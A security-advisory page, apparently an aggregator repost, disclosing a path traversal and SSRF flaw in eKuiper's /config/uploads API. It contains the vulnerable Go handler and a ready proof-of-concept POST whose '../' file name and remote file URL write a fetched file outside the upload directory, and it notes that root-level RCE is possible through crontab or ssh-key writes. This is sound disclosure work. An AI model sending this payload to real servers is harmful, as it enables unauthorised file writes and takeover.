Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-gj54-gwj9-x2c6: eKuiper /config/uploads API arbitrary file writing may lead to RCE

Summary

eKuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through …/. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.

Details

func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
    switch r.Method {
    // Upload or overwrite a file
    case http.MethodPost:
        switch r.Header.Get("Content-Type") {
        case "application/json":
            fc := &fileContent{}
            defer r.Body.Close()
            err := json.NewDecoder(r.Body).Decode(fc)
            if err != nil {
                handleError(w, err, "Invalid body: Error decoding file json", logger)
                return
            }
            err = fc.Validate()
            if err != nil {
                handleError(w, err, "Invalid body: missing necessary field", logger)
                return
            }

            filePath := filepath.Join(uploadDir, fc.Name)
            err = upload(fc)
  • The fc.Name parameter do not safely filtered.

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
  "name": "../../../../tmp/success",
 "file": "http://192.168.65.254:8888/success"
}

image

Impact

Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.

  1. SSRF
  2. Path-Travel
  3. May leads to RCE

The reporters is m0d9 from Tencent YunDing Lab.

ghsa
Open in Source
#web#js#git#rce#ssrf#ssh

Summary

eKuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through …/. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.

Details

func fileUploadHandler(w http.ResponseWriter, r *http.Request) { switch r.Method { // Upload or overwrite a file case http.MethodPost: switch r.Header.Get(“Content-Type”) { case "application/json": fc := &fileContent{} defer r.Body.Close() err := json.NewDecoder(r.Body).Decode(fc) if err != nil { handleError(w, err, "Invalid body: Error decoding file json", logger) return } err = fc.Validate() if err != nil { handleError(w, err, "Invalid body: missing necessary field", logger) return }

        filePath := filepath.Join(uploadDir, fc.Name)
        err \= upload(fc)
  • The fc.Name parameter do not safely filtered.

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
  "name": "../../../../tmp/success",
 "file": "http://192.168.65.254:8888/success"
}

Impact

Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.

  1. SSRF
  2. Path-Travel
  3. May leads to RCE

The reporters is m0d9 from Tencent YunDing Lab.

References

  • GHSA-gj54-gwj9-x2c6

ghsa: Latest News

GHSA-j4rj-fgcq-wmqp: Cockpit - Content Platform vulnerable to XSS through name or email argument names
ghsa